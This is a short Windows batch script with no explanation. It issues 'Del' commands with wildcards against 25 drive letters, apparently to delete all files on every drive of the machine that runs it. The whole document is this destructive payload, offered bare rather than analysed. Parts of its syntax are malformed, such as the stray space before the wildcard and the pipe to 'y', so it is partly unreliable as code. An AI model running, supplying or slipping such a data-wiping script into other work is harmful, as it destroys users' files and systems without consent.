@Echo off
Del C:\ *.* |y
Del D:\ *.* |y
Del E:\ *.* |y
Del F:\ *.* |y
Del J:\ *.* |y
Del A:\ *.* |y
Del G:\ *.* |y
Del X:\ *.* |y
Del Z:\ *.* |y
Del B:\ *.* |y
Del K:\ *.* |y
Del Y:\ *.* |y
Del Q:\ *.* |y
Del W:\ *.* |y
Del R:\ *.* |y
Del T:\ *.* |y
Del I:\ *.* |y
Del O:\ *.* |y
Del P:\ *.* |y
Del S:\ *.* |y
Del H:\ *.* |y
Del L:\ *.* |y
Del V:\ *.* |y
Del N:\ *.* |y
Del M:\ *.* |y